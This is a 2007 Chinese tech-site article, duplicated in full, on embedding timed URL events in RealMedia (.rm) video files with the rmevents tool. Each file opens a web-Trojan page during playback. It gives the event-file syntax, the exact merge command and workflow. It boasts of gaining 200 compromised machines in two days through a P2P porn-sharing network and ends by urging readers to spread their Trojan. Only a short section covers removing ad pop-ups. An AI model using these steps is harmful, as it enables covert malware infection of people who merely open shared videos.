在Real影片中放木馬后門
更新時間:2007年04月16日 00:00:00 作者:
在Real影片中放木馬后門.遇到類是情況希望大家注意
經(jīng)常遇到rm影片播放時彈出網(wǎng)頁,一直不知道怎么回事,前幾天看到了大眾軟件中一篇文章才知道插入和去除的方法,好東東不敢獨(dú)享,在網(wǎng)上搜了三篇相關(guān)文章,轉(zhuǎn)給大家拉!
在Real影片中放 木馬 在P2P軟件里,很多的Real影片都是危險(xiǎn)的,這只是一個小技巧,輔助的一種入侵方式,但這種方法很有效果,比如在著名的A片交流軟件PP點(diǎn)點(diǎn)通里,安裝了一個這樣的小木馬 ,兩天就有200個肉雞,并且呈幾何狀增長.大家別做壞事。 使用某個工具來修改影片的剪輯信息,可以在指定時間打開指定的窗口.
新建一個文本文件rmevents.txt. 輸入: u 00:01:00.0 00:01:30.0 http ://yjs.bit.edu.cn/bbs 我來解釋一下,它意思是說在00:01:00.0 00:01:30.0這個時間范圍內(nèi)打開后面的URL,后面的URL就是我們的 木馬 地址。 輸入rmevents -i 電影 .rm -e rmevents.txt -o 電影 1.rm 這個命令,生成的 電影 .rm就是我們的 木馬 文件了。 http ://yjs.bit.edu.cn/bbs 這個地址是你做好的網(wǎng)頁 木馬 的地址,不管是動鯊 木馬 啊,還是EXE2BMP的 木馬 ,還是什么CHM 木馬 . 防御方法更簡單,嘿嘿,不看 電影 就沒事了。要不就不用Realpalyer看吧,換別的播放器。
去除realoneplay里的網(wǎng)頁問題 這個彈出的網(wǎng)頁是由一開始壓制影片的人壓進(jìn)去的廣告頁??梢酝ㄟ^剛才的哪個軟件修改掉??!
在準(zhǔn)備個文本命令文件 文本命令如下 實(shí)例:在00:20.0(時分秒毫)—01:10.0時讓欣賞者自動彈出 http ://yjs.bit.edu.cn/bbs 主頁 在03:10.0(時分秒毫)—03:59.0時讓欣賞者自動彈出 http ://yjs.bit.edu.cn/bbs 主頁 1、編輯事件文件 新建一個記事本文件,命名為event.txt(可隨意),輸入以下內(nèi)容: u 00:20.0 01:10.0 http ://yjs.bit.edu.cn/bbs u 03:10.0 03:59.0 http ://yjs.bit.edu.cn/bbs 存盤后退出 解釋:u 表示URL事件, 00:20.0是起啟時間,01:10.0是結(jié)束時間,后面是指定的網(wǎng)頁.
下一步 將影片與網(wǎng)馬合并,在彈出的對話框中選擇剛才編輯的event.txt文件,確定后 開始合并事件,合并結(jié)束后,請將含有事件文件的RM文件另行保存。整個過程應(yīng)當(dāng)在15分鐘以內(nèi)完成,還是相當(dāng)快的。
剩下的就是把你的木馬放入網(wǎng)絡(luò)了!
經(jīng)常遇到rm影片播放時彈出網(wǎng)頁,一直不知道怎么回事,前幾天看到了大眾軟件中一篇文章才知道插入和去除的方法,好東東不敢獨(dú)享,在網(wǎng)上搜了三篇相關(guān)文章,轉(zhuǎn)給大家拉!
在Real影片中放 木馬 在P2P軟件里,很多的Real影片都是危險(xiǎn)的,這只是一個小技巧,輔助的一種入侵方式,但這種方法很有效果,比如在著名的A片交流軟件PP點(diǎn)點(diǎn)通里,安裝了一個這樣的小木馬 ,兩天就有200個肉雞,并且呈幾何狀增長.大家別做壞事。 使用某個工具來修改影片的剪輯信息,可以在指定時間打開指定的窗口.
新建一個文本文件rmevents.txt. 輸入: u 00:01:00.0 00:01:30.0 http ://yjs.bit.edu.cn/bbs 我來解釋一下,它意思是說在00:01:00.0 00:01:30.0這個時間范圍內(nèi)打開后面的URL,后面的URL就是我們的 木馬 地址。 輸入rmevents -i 電影 .rm -e rmevents.txt -o 電影 1.rm 這個命令,生成的 電影 .rm就是我們的 木馬 文件了。 http ://yjs.bit.edu.cn/bbs 這個地址是你做好的網(wǎng)頁 木馬 的地址,不管是動鯊 木馬 啊,還是EXE2BMP的 木馬 ,還是什么CHM 木馬 . 防御方法更簡單,嘿嘿,不看 電影 就沒事了。要不就不用Realpalyer看吧,換別的播放器。
去除realoneplay里的網(wǎng)頁問題 這個彈出的網(wǎng)頁是由一開始壓制影片的人壓進(jìn)去的廣告頁??梢酝ㄟ^剛才的哪個軟件修改掉??!
在準(zhǔn)備個文本命令文件 文本命令如下 實(shí)例:在00:20.0(時分秒毫)—01:10.0時讓欣賞者自動彈出 http ://yjs.bit.edu.cn/bbs 主頁 在03:10.0(時分秒毫)—03:59.0時讓欣賞者自動彈出 http ://yjs.bit.edu.cn/bbs 主頁 1、編輯事件文件 新建一個記事本文件,命名為event.txt(可隨意),輸入以下內(nèi)容: u 00:20.0 01:10.0 http ://yjs.bit.edu.cn/bbs u 03:10.0 03:59.0 http ://yjs.bit.edu.cn/bbs 存盤后退出 解釋:u 表示URL事件, 00:20.0是起啟時間,01:10.0是結(jié)束時間,后面是指定的網(wǎng)頁.
下一步 將影片與網(wǎng)馬合并,在彈出的對話框中選擇剛才編輯的event.txt文件,確定后 開始合并事件,合并結(jié)束后,請將含有事件文件的RM文件另行保存。整個過程應(yīng)當(dāng)在15分鐘以內(nèi)完成,還是相當(dāng)快的。
剩下的就是把你的木馬放入網(wǎng)絡(luò)了!
相關(guān)文章
讓McAfee來終結(jié)網(wǎng)站被掛馬的時代圖文教程
今年是互聯(lián)網(wǎng)上木馬、病毒和黑客橫行的一年。具體的事例不用我說,相信大家都有所耳聞。經(jīng)常上網(wǎng)的時候不小心進(jìn)個網(wǎng)站就中木馬了。不排除有一部分黑心的站長為了自己利益不顧網(wǎng)友的安全故意掛馬;還有很多站長是冤枉的,自己也是受害者——網(wǎng)站被入侵然后被掛馬了。2008-03-03
Web網(wǎng)絡(luò)安全分析Base64注入攻擊原理詳解
這篇文章主要為大家介紹了Web網(wǎng)絡(luò)安全分析Base64注入攻擊原理詳解,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪2021-11-11
Web網(wǎng)絡(luò)安全漏洞分析DOM型XSS攻擊原理
這篇文章主要為大家介紹了Web網(wǎng)絡(luò)安全漏洞分析DOM型XSS攻擊的原理詳解,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪2021-11-11
Web網(wǎng)絡(luò)安全漏洞分析存儲型XSS攻擊原理
這篇文章主要為大家介紹了Web網(wǎng)絡(luò)安全漏洞分析存儲型XSS攻擊原理,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步早日升職加薪2021-11-11
網(wǎng)絡(luò)安全滲透測試反序列化漏洞分析與復(fù)現(xiàn)工作
這篇文章主要為大家介紹了網(wǎng)絡(luò)安全滲透測試反序列化漏洞分析與復(fù)現(xiàn)的工作流程,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步2022-02-02
系統(tǒng)安全之加密與解密的應(yīng)用技巧與使用方法
系統(tǒng)安全之加密與解密的應(yīng)用技巧與使用方法...2007-08-08

